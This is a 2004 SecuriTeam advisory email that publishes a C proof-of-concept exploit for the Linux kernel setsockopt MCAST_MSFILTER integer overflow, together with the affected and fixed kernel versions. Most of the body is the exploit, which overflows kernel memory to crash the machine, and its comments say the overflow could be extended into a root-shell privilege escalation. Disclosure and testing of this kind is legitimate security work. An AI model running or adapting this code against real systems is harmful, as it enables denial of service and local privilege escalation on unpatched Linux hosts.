Date: 22 Apr 2004 13:01:14 +0200
From: SecuriTeam <[email protected]>
To: [email protected]Subject: [EXPL] Linux kernel 2.x setsockopt MCAST_MSFILTER Exploit
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Linux kernel 2.x setsockopt MCAST_MSFILTER Exploit
------------------------------------------------------------------------
SUMMARY
As we reported in our previous article:
<http://www.securiteam.com/unixfocus/5SP0L0ACKI.html> Linux Kernel
Setsockopt MCAST_MSFILTER Integer Overflow Vulnerability, a vulnerability
in Linux allows local attackers to gain elevated privileges. The following
exploit code can be used to test your system for the mentioned
vulnerability.
DETAILS
Vulnerable Systems:
* Linux kernel versions 2.4.22 up to 2.4.25, 2.6.1 up to 2.6.3
Immune Systems:
* Linux kernel versions 2.4.26, 2.6.4
Exploit:
/* setsockopt proof of concept code by Julien TINNES (julien a.t cr0.org)
vulnerability found (as always by Paul Starzetz
This is only a lame POC which will crash the machine, no root shell here.
Maybe later, when everybody will have an updated box.
It should work on 2.6.1, 2.6.2 and 2.6.3 kernels.
Greets to Christophe Devine, too bad you wasn't with me for this one.
*/
#include <errno.h>
void perror (const char *s);
#include <sys/types.h>
#include <sys/socket.h>
#include <linux/in.h>
#include <linux/socket.h>
#define SOL_IP 0
#define MCAST_MSFILTER 48
/* mynumsrc and alloc_room control the overflow
* what we write can be controlled too (not needed
* here but needed for rootshell exploit
*/
#define mynumsrc 0x100 /* 0x100 should be enough, can be tweaked */
#define alloc_room 1 /* let it alocate only one u32 */
struct mygroup_filter
{
__u32 gf_interface; /* interface index */
struct sockaddr_storage gf_group; /* multicast address */
__u32 gf_fmode; /* filter mode */
__u32 gf_numsrc; /* number of sources */
struct sockaddr_storage gf_slist[mynumsrc]; /* interface index */
};
void
main (void)
{
int mysocket;
int sockprot;
struct mygroup_filter mygroup;
int optlen;
int i;
struct sockaddr_in *psin;
mygroup.gf_interface = 0;
mygroup.gf_numsrc = (1 << 30) - 4 + alloc_room;
mygroup.gf_group.ss_family = AF_INET;
for (i = 0; i < mynumsrc; i++)
{
psin = (struct sockaddr_in *) &mygroup.gf_slist[i];
psin->sin_family = AF_INET;
}
mysocket = socket (PF_INET, SOCK_STREAM, 0);
if (mysocket == -1)
{
perror ("Socket creation error: ");
exit (1);
}
optlen = sizeof (struct mygroup_filter);
printf ("Calling setsockopt(), this should crash the box...\n");
sockprot = setsockopt (mysocket, SOL_IP, MCAST_MSFILTER, &mygroup,
optlen);
if (sockprot == -1)
{
perror ("Invalid setsockopt: ");
exit (1);
}
}
ADDITIONAL INFORMATION
The information has been provided by <mailto:[email protected]> Julien
TINNES.
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: [email protected]
In order to subscribe to the mailing list, simply forward this email to: [email protected]
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.